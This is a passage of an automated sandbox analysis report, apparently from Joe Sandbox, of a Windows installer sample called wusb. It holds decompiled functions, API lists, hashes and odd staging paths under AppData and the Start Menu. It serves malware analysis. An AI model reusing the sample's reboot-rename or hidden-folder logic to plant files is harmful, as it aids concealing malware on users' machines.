						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                        0x00402107
                                                        0x00402111
                                                        0x0040211b
                                                        0x00402125
                                                        0x00402130
                                                        0x00402133
                                                        0x0040214d
                                                        0x00402150
                                                        0x00402156
                                                        0x00402159
                                                        0x00402163
                                                        0x00402167
                                                        0x00402167
                                                        0x0040216c
                                                        0x0040217d
                                                        0x00402185
                                                        0x0040223c
                                                        0x0040223c
                                                        0x00402243
                                                        0x0040218b
                                                        0x0040218b
                                                        0x0040219a
                                                        0x0040219e
                                                        0x004021a1
                                                        0x004021a7
                                                        0x004021b5
                                                        0x004021b8
                                                        0x004021ba
                                                        0x004021c5
                                                        0x004021c5
                                                        0x004021ca
                                                        0x004021cc
                                                        0x004021d3
                                                        0x004021d3
                                                        0x004021d6
                                                        0x004021df
                                                        0x004021e2
                                                        0x004021e8
                                                        0x004021ea
                                                        0x004021f4
                                                        0x004021f4
                                                        0x004021f7
                                                        0x00402200
                                                        0x00402203
                                                        0x0040220c
                                                        0x00402212
                                                        0x00402214
                                                        0x00402222
                                                        0x00402222
                                                        0x00402225
                                                        0x0040222b
                                                        0x0040222b
                                                        0x0040222e
                                                        0x00402234
                                                        0x0040223a
                                                        0x0040224f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040223a
                                                        0x00402245
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 004021BD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth
                                                        • API String ID: 542301482-4145137140
                                                        • Opcode ID: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                        • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                        • Opcode Fuzzy Hash: 6a73a02503d44bb31e679befed85152b1616c559738105c0cf9dadfb40333c17
                                                        • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 39%
                                                        			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E00406193( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E0040624C();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                        0x0040287a
                                                        0x00402895
                                                        0x004028a0
                                                        0x004028a1
                                                        0x004029db
                                                        0x0040287c
                                                        0x0040287f
                                                        0x00402882
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                        • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                        • Opcode Fuzzy Hash: 4dcabbf17ade67e2922ca78fe286c3d9ba2f9d985751f28a6fa0d9db42db9f20
                                                        • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040437E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E0040437E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216b4 =  *0x4216b4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404248(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281a0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E0040462D(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a208, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a208, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216b4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226c0; // 0x6d0ddc
						_t29 = _t69 + 0x14; // 0x6d0df0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404203(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404609();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291dc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040432F;
				if(_t110 != 2) {
					_v8 = E004042F5;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004041E1(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004041E1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404203( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404216(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a214 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216b4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216b4 = 0;
				return 0;
			}



















                                                        0x00404390
                                                        0x004044bd
                                                        0x0040451a
                                                        0x0040451e
                                                        0x004045eb
                                                        0x004045ed
                                                        0x004045ed
                                                        0x004045f3
                                                        0x004045f3
                                                        0x004045f6
                                                        0x00000000
                                                        0x004045fd
                                                        0x0040452c
                                                        0x00404532
                                                        0x0040453c
                                                        0x00404547
                                                        0x0040454a
                                                        0x0040454d
                                                        0x00404558
                                                        0x0040455b
                                                        0x00404562
                                                        0x0040456f
                                                        0x00404580
                                                        0x00404586
                                                        0x0040458e
                                                        0x0040459c
                                                        0x004045a2
                                                        0x004045a2
                                                        0x00404562
                                                        0x004045ac
                                                        0x00000000
                                                        0x004045b7
                                                        0x004045bb
                                                        0x004045cb
                                                        0x004045cb
                                                        0x004045d1
                                                        0x004045dd
                                                        0x004045dd
                                                        0x00000000
                                                        0x004045e1
                                                        0x004045ac
                                                        0x004044c8
                                                        0x00000000
                                                        0x004044da
                                                        0x004044da
                                                        0x004044df
                                                        0x004044df
                                                        0x004044e5
                                                        0x00000000
                                                        0x00000000
                                                        0x0040450e
                                                        0x00404510
                                                        0x00404515
                                                        0x00000000
                                                        0x00404515
                                                        0x004044c8
                                                        0x00404396
                                                        0x00404399
                                                        0x0040439e
                                                        0x004043af
                                                        0x004043af
                                                        0x004043b7
                                                        0x004043ba
                                                        0x004043be
                                                        0x004043c1
                                                        0x004043c5
                                                        0x004043c8
                                                        0x004043cb
                                                        0x004043ce
                                                        0x004043d5
                                                        0x004043d7
                                                        0x004043d7
                                                        0x004043e1
                                                        0x004043ee
                                                        0x004043f8
                                                        0x004043fd
                                                        0x00404400
                                                        0x00404405
                                                        0x0040441c
                                                        0x00404423
                                                        0x00404436
                                                        0x00404439
                                                        0x0040444d
                                                        0x00404454
                                                        0x00404459
                                                        0x0040445e
                                                        0x0040445e
                                                        0x0040446c
                                                        0x0040447a
                                                        0x0040448c
                                                        0x00404491
                                                        0x004044a1
                                                        0x004044a3
                                                        0x00000000

                                                        APIs
                                                        • CheckDlgButton.USER32 ref: 0040441C
                                                        • GetDlgItem.USER32 ref: 00404430
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                        • GetSysColor.USER32(?), ref: 0040445E
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                        • lstrlenW.KERNEL32(?), ref: 0040447F
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                        • GetDlgItem.USER32 ref: 004044FA
                                                        • SendMessageW.USER32(00000000), ref: 00404501
                                                        • GetDlgItem.USER32 ref: 0040452C
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                                        • SetCursor.USER32(00000000), ref: 00404580
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                                        • SetCursor.USER32(00000000), ref: 0040459C
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 0040455B
                                                        • N, xrefs: 0040451A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$N
                                                        • API String ID: 3103080414-144539329
                                                        • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                        • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                        • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                        • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a214;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429200, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a208;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                        0x0040100a
                                                        0x00401039
                                                        0x00401047
                                                        0x0040104d
                                                        0x00401051
                                                        0x0040105b
                                                        0x00401061
                                                        0x00401064
                                                        0x004010f3
                                                        0x00401089
                                                        0x0040108c
                                                        0x004010a6
                                                        0x004010bd
                                                        0x004010cc
                                                        0x004010cf
                                                        0x004010d5
                                                        0x004010d9
                                                        0x004010e4
                                                        0x004010ed
                                                        0x004010ef
                                                        0x004010ef
                                                        0x00401100
                                                        0x00401105
                                                        0x0040110d
                                                        0x00401110
                                                        0x00401112
                                                        0x00401118
                                                        0x0040111f
                                                        0x00401126
                                                        0x00401130
                                                        0x00401142
                                                        0x00401156
                                                        0x00401160
                                                        0x00401165
                                                        0x00401165
                                                        0x00401110
                                                        0x0040116e
                                                        0x00000000
                                                        0x00401178
                                                        0x00401010
                                                        0x00401013
                                                        0x00401015
                                                        0x0040101f
                                                        0x0040101f
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32 ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32 ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                        • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                        • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                        • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405E98(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426d88 = 0x55004e;
				 *0x426d8c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x427588, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x426988, "%ls=%ls\r\n", 0x426d88, 0x427588);
						_t53 = _t52 + 0x10;
						E0040626E(_t37, 0x400, 0x427588, 0x427588,  *((intOrPtr*)( *0x42a214 + 0x128)));
						_t12 = E00405D3E(0x427588, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DC1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CA3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CA3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405CF9(_t24 + _t46, 0x426988, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405DF0(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D3E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426d88, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                        0x00405e98
                                                        0x00405ea1
                                                        0x00405ea8
                                                        0x00405eb2
                                                        0x00405ec6
                                                        0x00405eee
                                                        0x00405ef9
                                                        0x00405efd
                                                        0x00405f1d
                                                        0x00405f24
                                                        0x00405f2e
                                                        0x00405f3b
                                                        0x00405f40
                                                        0x00405f45
                                                        0x00405f49
                                                        0x00405f58
                                                        0x00405f5a
                                                        0x00405f67
                                                        0x00405f6b
                                                        0x00406006
                                                        0x00000000
                                                        0x00405f81
                                                        0x00405f8e
                                                        0x00405fb2
                                                        0x00405fb6
                                                        0x00405fd5
                                                        0x00405fd9
                                                        0x00405fd9
                                                        0x00405fdb
                                                        0x00405fe4
                                                        0x00405fef
                                                        0x00405ffa
                                                        0x00406000
                                                        0x00000000
                                                        0x00406000
                                                        0x00405fb8
                                                        0x00405fbb
                                                        0x00405fc6
                                                        0x00405fc2
                                                        0x00405fc4
                                                        0x00405fc5
                                                        0x00405fc5
                                                        0x00405fcd
                                                        0x00405fcf
                                                        0x00000000
                                                        0x00405fcf
                                                        0x00405f99
                                                        0x00405f9f
                                                        0x00000000
                                                        0x00405f9f
                                                        0x00405f6b
                                                        0x00405f49
                                                        0x00405ec8
                                                        0x00405ed3
                                                        0x00405edc
                                                        0x00405ee0
                                                        0x00000000
                                                        0x00000000
                                                        0x00405ee0
                                                        0x00406011

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                                        • GetShortPathNameW.KERNEL32 ref: 00405EDC
                                                          • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                          • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                        • GetShortPathNameW.KERNEL32 ref: 00405EF9
                                                        • wsprintfA.USER32 ref: 00405F17
                                                        • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                        • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                        • GlobalFree.KERNEL32 ref: 00406000
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                                          • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                          • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        Strings
                                                        Memory Dump Source
